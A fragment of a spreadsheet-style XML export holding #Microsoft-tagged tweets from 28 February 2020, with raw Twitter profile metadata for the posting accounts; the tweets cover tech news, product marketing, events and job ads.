    <t>{'id': 2194384232, 'id_str': '2194384232', 'name': 'Formatech Lebanon', 'screen_name': 'FormatechLeb', 'location': '', 'description': 'Formatech is the leading training center offering the highest quality of certified IT Training, Graphic, Web, Project Management and Business courses in Lebanon', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 187, 'friends_count': 156, 'listed_count': 18, 'created_at': 'Thu Nov 14 15:24:13 +0000 2013', 'favourites_count': 12, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1246,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'http://pbs.twimg.com/profile_images/1071807155790065665/GjawxgVr_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1071807155790065665/GjawxgVr_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2194384232/1544373740',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</si>
  <si>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11:41:03 +0000 2020</t>
  </si>
  <si>
    <t>Coronavirus: #Microsoft exits developer event and revises outlook https://t.co/hx8vnuIB3U via @Hybrid_Circle #Cloud #AWS https://t.co/4NJGGAs4nI</t>
  </si>
  <si>
    <t>Fri Feb 28 11:39:27 +0000 2020</t>
  </si>
  <si>
    <t>Year of the Nurse &amp;amp; Midwife Episode 1 - Microsoft Tech Community #HealthTech #heathcare #Microsoft  https://t.co/D8YjQFHjlE</t>
  </si>
  <si>
    <t>Fri Feb 28 11:31:19 +0000 2020</t>
  </si>
  <si>
    <t>MSP Open Day , Tamil Nadu India 
Day 1 ends with a Bang .
200+ attendees 4+ workshop .
Thank you @IamPablo @MicrosoftIndia @Azure  for your continuous support.
#Azure #Microsoft #community #learning https://t.co/LF97W5iQkh</t>
  </si>
  <si>
    <t>{'id': 2901542888, 'id_str': '2901542888', 'name': 'Shubham Gupta', 'screen_name': 'shubham15gupta0', 'location': 'India', 'description': 'ðŸ‡®ðŸ‡³ 21 | @Microsoft Beta Student partnerâ¤ï¸ | @google codein19 mentorðŸ§ | #community speakerðŸŽ™ï¸ | Python , ML , DL , Azure, Tensorflow | open source', 'url': 'https://t.co/RJQxWB7afO', 'entities': {'url': {'urls': [{'url': 'https://t.co/RJQxWB7afO', 'expanded_url': 'https://github.com/shubham15gupta09', 'display_url': 'github.com/shubham15guptaâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 104, 'friends_count': 138, 'listed_count': 0, 'created_at': 'Sun Nov 16 11:22:03 +0000 2014', 'favourites_count': 1103, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1645,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'http://pbs.twimg.com/profile_images/1219964958328283138/1knVcw7C_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1219964958328283138/1knVcw7C_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2901542888/1580741529',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</si>
  <si>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11:30:35 +0000 2020</t>
  </si>
  <si>
    <t>Technology can save more lives, alleviate suffering and restore human dignity by changing the way frontline relief organizations anticipate, predict and better target response efforts. Subscribe to learn more about what #Microsoft can do for you! https://t.co/63TDpRECK0</t>
  </si>
  <si>
    <t>{'id': 3747644053, 'id_str': '3747644053', 'name': 'Compusoft Advisors India Pvt. Ltd.', 'screen_name': 'CompusoftAdvise', 'location': 'India', 'description': 'Microsoft Dynamics 365 CRM / ERP || Microsoft Cloud (Azure) || PowerBI, PowerApps &amp; Flow || AI based Omni-Channel BOT Platform.\nFollow Us: https://t.co/xVkTRBdOJm', 'url': 'http://t.co/IqXRzj8BYI', 'entities': {'url': {'urls': [{'url': 'http://t.co/IqXRzj8BYI', 'expanded_url': 'http://www.compusoftadvisors.com', 'display_url': 'compusoftadvisors.com', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'https://t.co/xVkTRBdOJm', 'expanded_url': 'http://lnkd.in/gn5CTDS', 'display_url': 'lnkd.in/gn5CTDS', 'indices': [139, 162]}]}}, 'protected': False, 'followers_count': 615, 'friends_count': 86, 'listed_count': 4, 'created_at': 'Thu Oct 01 11:59:09 +0000 2015', 'favourites_count': 48, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 374,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'http://pbs.twimg.com/profile_images/1171035071106576390/4FDWKYZB_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1171035071106576390/4FDWKYZB_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3747644053/1556781733',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</si>
  <si>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11:30:11 +0000 2020</t>
  </si>
  <si>
    <t>More than 56% of Organizations use Office 365 and it is the world's most used cloud service. Read how and why network can affect the performance of Office 365 and how you can get the most out of the application.
https://t.co/Ck3aifxyn2
#Office365 #network #cloud #microsoft</t>
  </si>
  <si>
    <t>{'id': 744812384443760641, 'id_str': '744812384443760641', 'name': 'Lavelle Networks', 'screen_name': 'lavellenetworks', 'location': 'Bengaluru, India', 'description': 'Lavelle Networks provides #SDWAN #Enterprise solutions to build #cloud ready networks.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 6204, 'friends_count': 5962, 'listed_count': 68, 'created_at': 'Mon Jun 20 08:41:25 +0000 2016', 'favourites_count': 933, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 9355,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'http://pbs.twimg.com/profile_images/1113338535547887616/DlEycmRD_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1113338535547887616/DlEycmRD_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/744812384443760641/1579160649',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</si>
  <si>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11:28:41 +0000 2020</t>
  </si>
  <si>
    <t>Do you think #GDC will get cancelled today?
What are you thoughts on its refund policy?
#coronavirus #Sony #Microsoft #Unity #EpicGames
https://t.co/UWXEL7YYfP</t>
  </si>
  <si>
    <t>{'id': 745344777852444673, 'id_str': '745344777852444673', 'name': 'Game World Observer', 'screen_name': 'GWObserver', 'location': 'Ð¡Ð°Ð½ÐºÑ‚-ÐŸÐµÑ‚ÐµÑ€Ð±ÑƒÑ€Ð³, Ð Ð¾ÑÑÐ¸Ñ', 'description': 'We are online magazine that covers #gamedevelopment from the business perspective.', 'url': 'https://t.co/fLAHbJ0qqx', 'entities': {'url': {'urls': [{'url': 'https://t.co/fLAHbJ0qqx', 'expanded_url': 'http://gameworldobserver.com', 'display_url': 'gameworldobserver.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 64, 'friends_count': 45, 'listed_count': 22, 'created_at': 'Tue Jun 21 19:56:57 +0000 2016', 'favourites_count': 249, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 480, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1113745555933597696/EZW_rFKY_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1113745555933597696/EZW_rFKY_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/745344777852444673/1554374037',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</si>
  <si>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11:27:00 +0000 2020</t>
  </si>
  <si>
    <t>Looking at moving from NAV to Business Central? Do you do an upgrade or is it better to re-implement? We look at some of the key factors.
https://t.co/WENYCwr1zX
#businesscentral #microsoft #dynamics365 #dynamics365businesscentral #upgrade #business #southampton #portsmouth https://t.co/VfeM7p8Spv</t>
  </si>
  <si>
    <t>Fri Feb 28 11:25:26 +0000 2020</t>
  </si>
  <si>
    <t>Worlds biggest #BlueScreenOfDeath ? #Microsoft #Bluewater https://t.co/3lQFjjMXYt</t>
  </si>
  <si>
    <t>{'id': 299049925, 'id_str': '299049925', 'name': 'Dave Taskis', 'screen_name': 'FatherFantaskis', 'location': 'Darkest Essex, UK', 'description': "Despairing parent, seeking recovery of money squandered on childrens' education. Although, they seem to have turned out alright.\n\nEx-hydrogeologist.", 'url': 'https://t.co/cPmlK7PJIf', 'entities': {'url': {'urls': [{'url': 'https://t.co/cPmlK7PJIf', 'expanded_url': 'http://dyvroeth.blogspot.co.uk/', 'display_url': 'dyvroeth.blogspot.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 165, 'friends_count': 191, 'listed_count': 63, 'created_at': 'Sun May 15 12:24:00 +0000 2011', 'favourites_count': 3162, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 17021,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'http://pbs.twimg.com/profile_images/1354361292/dyvroeth_weeme_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1354361292/dyvroeth_weeme_normal.png',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</si>
  <si>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Fri Feb 28 11:17:37 +0000 2020</t>
  </si>
  <si>
    <t>#LinkedIn teste des stories comme Snapchat - #Actualites #Apps #High_Tech #Microsoft
 https://t.co/ozZZBcVBgN</t>
  </si>
  <si>
    <t>{'id': 4865312458, 'id_str': '4865312458', 'name': 'Monde Informatique', 'screen_name': 'mondeinformati1', 'location': 'Oujda Angad, Oriental', 'description': 'ObsÃ©dÃ© par la #technologie.\nPour en savoir plus, cliquez ici ðŸ‘‰ðŸŒ https://t.co/WvkUXrXTBA', 'url': 'https://t.co/WvkUXrXTBA', 'entities': {'url': {'urls': [{'url': 'https://t.co/WvkUXrXTBA', 'expanded_url': 'https://www.monde-informatique.com', 'display_url': 'monde-informatique.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/WvkUXrXTBA', 'expanded_url': 'https://www.monde-informatique.com', 'display_url': 'monde-informatique.com', 'indices': [64, 87]}]}}, 'protected': False, 'followers_count': 493, 'friends_count': 161, 'listed_count': 35, 'created_at': 'Sat Jan 30 22:08:31 +0000 2016', 'favourites_count': 3159, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3789, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '77CCF0', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1175047633758490625/Xwc4xscU_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1175047633758490625/Xwc4xscU_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4865312458/1568983587', 'profile_link_color': 'E5127D',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</si>
  <si>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11:15:09 +0000 2020</t>
  </si>
  <si>
    <t>Today Can we see GREEN Close in Dow Jones index 
My view and Chart say today we see Green Close in USA index...
lests see whats happen..
#Dow #NASDAQ #SNP #Investment #investing #Trade #USA #Dow #USA #Warren2020 #Google #Microsoft #AppleStore #Tesla #Goldman #Walmart #Disney</t>
  </si>
  <si>
    <t>{'id': 275524888, 'id_str': '275524888', 'name': 'Sairam Stocks', 'screen_name': 'SairamStocks', 'location': 'Ahmadabad City, India', 'description': 'I m Arun Rangpariya (SEBI Reg RA).Educational &amp; Information Purpose Only. Invest &amp; Trade in stocks market is Always Risky. Before Invest Consult ur Fin. Adviser', 'url': 'https://t.co/ncvvFrtGXM', 'entities': {'url': {'urls': [{'url': 'https://t.co/ncvvFrtGXM', 'expanded_url': 'http://www.sairamstocks.com', 'display_url': 'sairamstocks.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 277, 'friends_count': 6, 'listed_count': 2, 'created_at': 'Fri Apr 01 13:09:44 +0000 2011', 'favourites_count': 20, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 348,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'http://pbs.twimg.com/profile_images/1207626966855143424/X4f-iiFA_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1207626966855143424/X4f-iiFA_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/275524888/1576756183',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</si>
  <si>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11:14:37 +0000 2020</t>
  </si>
  <si>
    <t>@OASystemsLtd and @SolgariConverse announce strategic partnership in New Zealand.
https://t.co/p9mVbgJFdr
#OASystems #Solgari #Business #Microsoft #Innovation #Partnership #ISV #Msdyn365 https://t.co/hhVGTUbJ9V</t>
  </si>
  <si>
    <t>Fri Feb 28 11:14:01 +0000 2020</t>
  </si>
  <si>
    <t>Congratulations to @Rezzil_ @TAGPAY_ and @CamOnApp for winning the #StartupCompetition of @sportssummitmx! We are happy to welcome you as a new #GSIC members 
#sports #innovation #technology #startups #competition #microsoft #latam https://t.co/twENNMO7DW</t>
  </si>
  <si>
    <t>Fri Feb 28 11:12:32 +0000 2020</t>
  </si>
  <si>
    <t>Hello #Redmond!Passionate about #Microsoft technologies for business? Don't miss #Office365 Saturday, #O365SRED, on March 7, and WEBCON NA Chief Evangelist &amp;amp; VP, Mike Fitzmaurice, session on Stages &amp;amp; State Machines for Managing and Modeling #Workflows! https://t.co/7QtxmdkjtA https://t.co/TaRaBcTMPD</t>
  </si>
  <si>
    <t>{'id': 1070682284, 'id_str': '1070682284', 'name': 'WEBCON', 'screen_name': 'WEBCON_BPS', 'location': '', 'description': 'WEBCON develops a Low-Code Process Automation Platform that allows for delivery &amp; continuous improvement of Enterprise-Grade Business Applications.', 'url': 'http://t.co/HuEzP2vOoy', 'entities': {'url': {'urls': [{'url': 'http://t.co/HuEzP2vOoy', 'expanded_url': 'http://www.webcon.com', 'display_url': 'webcon.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 222, 'friends_count': 124, 'listed_count': 14, 'created_at': 'Tue Jan 08 11:39:58 +0000 2013', 'favourites_count': 887, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 846, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '3B3D3D', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/918066853662068737/OH8DqsFN_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/918066853662068737/OH8DqsFN_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1070682284/1562318301', 'profile_link_color': 'DC002E',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'regular'}</t>
  </si>
  <si>
    <t>Fri Feb 28 11:11:43 +0000 2020</t>
  </si>
  <si>
    <t>A big thank you to @Microsoft for letting us use their office for our company meeting. We may leave a cupcake or two for you! #bestcompanies #cupcakes #microsoft https://t.co/SsqFQxDvxY</t>
  </si>
  <si>
    <t>{'id': 2598189846, 'id_str': '2598189846', 'name': 'HSO', 'screen_name': 'HSO_Tweets', 'location': 'International', 'description': 'HSO is a leading provider of #MicrosoftDynamics365 Software which improve the results of our clients all over the world.', 'url': 'http://t.co/Pk05F2dwlx', 'entities': {'url': {'urls': [{'url': 'http://t.co/Pk05F2dwlx', 'expanded_url': 'http://www.hso.com/', 'display_url': 'hso.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 595, 'friends_count': 724, 'listed_count': 183, 'created_at': 'Tue Jul 01 16:07:07 +0000 2014', 'favourites_count': 555, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3997,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'http://pbs.twimg.com/profile_images/788306325260406784/IqQvcjrK_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/788306325260406784/IqQvcjrK_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2598189846/1532707007', 'profile_link_color': '151B8D',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</si>
  <si>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11:11:38 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "49 Million Unique Emails Exposed Due to Mishandled Credentials:" https://t.co/mK4jYPGn61
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Fri Feb 28 11:11:07 +0000 2020</t>
  </si>
  <si>
    <t>Where to Find All Microsoft Events Near You -  #SharePoint #Office365 #Microsoft  -  https://t.co/na4SBneJiZ</t>
  </si>
  <si>
    <t>Fri Feb 28 11:09:27 +0000 2020</t>
  </si>
  <si>
    <t>Announcing New Storage Options for Azure Cloud Shell https://t.co/dpLStBSosA #Microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 11:08:19 +0000 2020</t>
  </si>
  <si>
    <t>looks like #Microsoft #Blazor is taking off https://t.co/SoyJ8RmUG3 #Android #IoS #Software #Apps #MobileApp #Technews #programming</t>
  </si>
  <si>
    <t>Fri Feb 28 11:06:38 +0000 2020</t>
  </si>
  <si>
    <t>When monitoring Hyper-V performance, you often only need specific counter data. Learn to develop performance counter tools based on the information you need from @JeffHicks #Microsoft #HyperV https://t.co/NyvAiIrrQ7</t>
  </si>
  <si>
    <t>Fri Feb 28 11:01:30 +0000 2020</t>
  </si>
  <si>
    <t>Home and End in Excel: Press the Home key to jump to column A. Press End followed by an arrow key to go to the end in the arrow's direction #Excel #Microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 11:01:22 +0000 2020</t>
  </si>
  <si>
    <t>Speedy, accurate customer service is an advantage. So is saving time by using one system to get a complete view of the customer lifecycle. QGate Software Limited delivers it all with #Microsoft #Dynamics 365, LinkedIn and #Office365 https://t.co/aKWwJuUGTc</t>
  </si>
  <si>
    <t>Fri Feb 28 11:00:13 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft, PlayStation, Kojima Productions, Facebook, Epic Games y Unity cancelan su asistencia a la GDC 2020 por el coronavirus
https://t.co/wabMeDn8rU
#Microsoft #Epicgames #KojimaProductions #Facebook  #unity #PlayStation https://t.co/p4iR7dJVst</t>
  </si>
  <si>
    <t>{'id': 723169351914811392, 'id_str': '723169351914811392', 'name': 'zonafree2play', 'screen_name': 'elantipulpos', 'location': 'Miami, FL', 'description': 'Espacio dedicado a solo juegos F2P\n\nSÃ­guenos:\n\nFacebook: https://t.co/x2rROxuINR\nGoogle+: El antipulpos\nyoutube: https://t.co/vHjJrbWEFm\nInstagram @anibalgamer\nhttps://t.co/hDKdZttmnc', 'url': 'https://t.co/Qg4mPHXweW', 'entities': {'url': {'urls': [{'url': 'https://t.co/Qg4mPHXweW', 'expanded_url': 'http://www.zonafree2play.com', 'display_url': 'zonafree2play.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/x2rROxuINR', 'expanded_url': 'http://goo.gl/3Qs4ay', 'display_url': 'goo.gl/3Qs4ay', 'indices': [57, 80]}, {'url': 'https://t.co/vHjJrbWEFm', 'expanded_url': 'http://goo.gl/p6z3RZ', 'display_url': 'goo.gl/p6z3RZ', 'indices': [113, 136]}, {'url': 'https://t.co/hDKdZttmnc', 'expanded_url': 'http://zonafree2play.com', 'display_url': 'zonafree2play.com', 'indices': [160, 183]}]}}, 'protected': False, 'followers_count': 7708, 'friends_count': 29, 'listed_count': 39, 'created_at': 'Thu Apr 21 15:19:44 +0000 2016', 'favourites_count': 3978, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2531,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'http://pbs.twimg.com/profile_images/748232513215152129/6zuWCfPB_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/748232513215152129/6zuWCfPB_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/723169351914811392/1461612457',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</si>
  <si>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11:00:00 +0000 2020</t>
  </si>
  <si>
    <t>John Hamm at @TexasChildrens explains to @jcarlat how building out their #HybridCloud with @HPE &amp;amp; #Microsoft helped them shift the way they think about infrastructure.  
#HybridIT #Azure #HCIT #HIPAA #DevOps #Azure #HPEAlliances https://t.co/CdGeSCdhyu</t>
  </si>
  <si>
    <t>Fri Feb 28 10:58:39 +0000 2020</t>
  </si>
  <si>
    <t>Fri Feb 28 10:58:38 +0000 2020</t>
  </si>
  <si>
    <t>Fri Feb 28 10:58:02 +0000 2020</t>
  </si>
  <si>
    <t>Fri Feb 28 10:57:59 +0000 2020</t>
  </si>
  <si>
    <t>Fri Feb 28 10:55:13 +0000 2020</t>
  </si>
  <si>
    <t>Die beste Bluetooth-Tastatur - https://t.co/aXwE4QLLhd
#AllesBeste #Test #Anker #Apple #BluetoothKeyboard #BluetoothTastatur #CSL #Logitech #Microsoft https://t.co/PRVmd1POio</t>
  </si>
  <si>
    <t>{'id': 2198627814, 'id_str': '2198627814', 'name': 'AllesBeste.de', 'screen_name': 'AllesBeste_de', 'location': '', 'description': 'Wir recherchieren und testen fÃ¼r Sie die besten Produkte, die zur Zeit auf dem Markt sind. Auf AllesBeste.de finden Sie einfach nur das Beste!', 'url': 'http://t.co/auuuyIMCDT', 'entities': {'url': {'urls': [{'url': 'http://t.co/auuuyIMCDT', 'expanded_url': 'http://AllesBeste.de', 'display_url': 'AllesBeste.de', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 160, 'friends_count': 194, 'listed_count': 9, 'created_at': 'Sun Nov 17 00:26:36 +0000 2013', 'favourites_count': 7, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2038, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '014359', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1127870427123146753/jVgv-ksJ_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1127870427123146753/jVgv-ksJ_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2198627814/1569483591',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</si>
  <si>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Feb 28 10:54:40 +0000 2020</t>
  </si>
  <si>
    <t>Must give this one to #Microsoft the new #InternetExplorer #Edge or whatever is called is freaking fantastic. Thanks to the chromium of course.</t>
  </si>
  <si>
    <t>{'id': 251036764, 'id_str': '251036764', 'name': 'Dejan Vasic', 'screen_name': 'dejanvasic85', 'location': 'Melbourne, Victoria', 'description': 'Profession: Software Developer/Engineer, Ex Footballer now coach (round ball)', 'url': 'https://t.co/0SXmxk872o', 'entities': {'url': {'urls': [{'url': 'https://t.co/0SXmxk872o', 'expanded_url': 'http://dejanvasic.wordpress.org', 'display_url': 'dejanvasic.wordpress.org', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 86, 'friends_count': 266, 'listed_count': 9, 'created_at': 'Sat Feb 12 09:19:34 +0000 2011', 'favourites_count': 133, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2050,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'http://pbs.twimg.com/profile_images/481171999033544704/Oq38LsXM_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/481171999033544704/Oq38LsXM_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/251036764/1403555123',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</si>
  <si>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10:51:33 +0000 2020</t>
  </si>
  <si>
    <t>#DidYouKnow the default contact picture in #Outlook2010 was based on Bill Gates mugshot from 1977, when he was arrested for a traffic violation in New Mexico. #FunFactFriday #FlashbackFriday #Microsoft #Mugshot https://t.co/CYB4QlN4ss</t>
  </si>
  <si>
    <t>{'id': 964092366, 'id_str': '964092366', 'name': 'OES-UK', 'screen_name': 'OESUKLtd', 'location': 'Denbigh, North Wales.', 'description': 'Providing I.T. Print &amp; Web Solutions to businesses across the #NorthWest and #NorthWales - #IT #Print #Web', 'url': 'http://t.co/MIATtQId0A', 'entities': {'url': {'urls': [{'url': 'http://t.co/MIATtQId0A', 'expanded_url': 'http://www.oes-uk.com', 'display_url': 'oes-uk.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1204, 'friends_count': 2476, 'listed_count': 9, 'created_at': 'Thu Nov 22 11:32:40 +0000 2012', 'favourites_count': 39, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 580, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '448FC9', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme4/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme4/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1111215684393074688/t3EQlHuw_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1111215684393074688/t3EQlHuw_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/964092366/1545401025', 'profile_link_color': '36ABCF',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</si>
  <si>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Feb 28 10:50:44 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft rolls out Cumulative update KB4535996 which brings the OS builds to 18362.693 and 18363.693 for Windows 10 version 1903 and 1909.
#1903 #1909 #Build18362 #Build18363 #KB4535996 #Microsoft #Windows10 #Windows10May2019update #Windows10November2 https://t.co/wPkbnq6jxs https://t.co/ids7ERJ7VS</t>
  </si>
  <si>
    <t>Fri Feb 28 10:50:04 +0000 2020</t>
  </si>
  <si>
    <t>Our webinar on best practice in desktop/device management is starting in five! 
Last chance to join: https://t.co/O2gAkfFqz8
#windows10 #devicemanagement #microsoft #endpointmanagement #cybersecurity #WaaS https://t.co/DUFOv9Nwxb</t>
  </si>
  <si>
    <t>Fri Feb 28 10:34:33 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Launches 100X100X100 #SaaS #Accelerator Ahead Of #Nadellas India Visit
https://t.co/xXFbUUU6ON</t>
  </si>
  <si>
    <t>Fri Feb 28 10:33:36 +0000 2020</t>
  </si>
  <si>
    <t>Blog views 2019/2020 for January/February so far, great increase so far!
Haven't checked out my #azure blog yet? 
https://t.co/TD8d2RXvds
Feel free to subscribe as well!
#microsoft #azure #azurefamily https://t.co/ODiK1zkHFe</t>
  </si>
  <si>
    <t>Fri Feb 28 10:32:49 +0000 2020</t>
  </si>
  <si>
    <t>$MSFT https://t.co/ZTIcvYqTx7 Pot. intermed top in Uptrend LONGERTERM Wly-Dly-Hly combo chart #Microsoft #trading https://t.co/85eQltKazK</t>
  </si>
  <si>
    <t>Fri Feb 28 10:32:25 +0000 2020</t>
  </si>
  <si>
    <t>Capita plc is hiring a remote Microsoft Azure Developer  #dev #microsoft #digital-nomad 
 https://t.co/G90TKk9fhF</t>
  </si>
  <si>
    <t>{'id': 820629052671361024, 'id_str': '820629052671361024', 'name': 'Remote OK Jobs', 'screen_name': 'remoteokjobs', 'location': '', 'description': 'Apply for remote jobs or hire remotely by posting a job', 'url': 'https://t.co/RsE75oMKZk', 'entities': {'url': {'urls': [{'url': 'https://t.co/RsE75oMKZk', 'expanded_url': 'http://remoteokjobs.com', 'display_url': 'remoteokjobs.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 49, 'friends_count': 210, 'listed_count': 0, 'created_at': 'Sun Jan 15 13:49:47 +0000 2017', 'favourites_count': 278, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 314,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'http://pbs.twimg.com/profile_images/1230847861790822401/oU_3gJA6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1230847861790822401/oU_3gJA6_normal.jpg',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</si>
  <si>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10:30:26 +0000 2020</t>
  </si>
  <si>
    <t>Meet Six-Word Lessons author Jim DuBois: former #microsoft #CIO, world #traveler, aspiring #Sci-Fi novelist #snackablewisdom #ad https://t.co/tv7JgN9dAX https://t.co/660PBo7PPo</t>
  </si>
  <si>
    <t>{'id': 930755930, 'id_str': '930755930', 'name': 'Pacelli Publishing', 'screen_name': 'PacelliPublish', 'location': 'Bellevue, Washington', 'description': 'Self-publishing company with a series of books to help people share their expertise and become published authors.', 'url': 'http://t.co/otfkclCp', 'entities': {'url': {'urls': [{'url': 'http://t.co/otfkclCp', 'expanded_url': 'http://pacellipublishing.com', 'display_url': 'pacellipublishing.com', 'indices': [0, 20]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 659, 'friends_count': 859, 'listed_count': 46, 'created_at': 'Tue Nov 06 23:29:42 +0000 2012', 'favourites_count': 46, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3484,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'http://pbs.twimg.com/profile_images/3464863876/17ae7c8bd63bc7307a07aac5e44fd4cf_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/3464863876/17ae7c8bd63bc7307a07aac5e44fd4cf_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/930755930/1366830280',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</si>
  <si>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10:28:07 +0000 2020</t>
  </si>
  <si>
    <t>BIG Thanks to @AdamUSDFC, Team @DFCgov &amp;amp; #DevexLIVE for hosting such an important conversation today @ #Microsoft Innovation &amp;amp; Policy Center in Washington DC !</t>
  </si>
  <si>
    <t>{'id': 1201465079822192640, 'id_str': '1201465079822192640', 'name': 'The Infrastructure Development Fund', 'screen_name': 'TheInfrastruct2', 'location': '', 'description': 'The IDF is a private equity fund dedicated to infrastructure development in Africa', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 30, 'friends_count': 132, 'listed_count': 0, 'created_at': 'Mon Dec 02 11:36:28 +0000 2019', 'favourites_count': 55, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 182, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1201466373198798849/bhuZccLS_normal.png', 'profile_image_url_https': 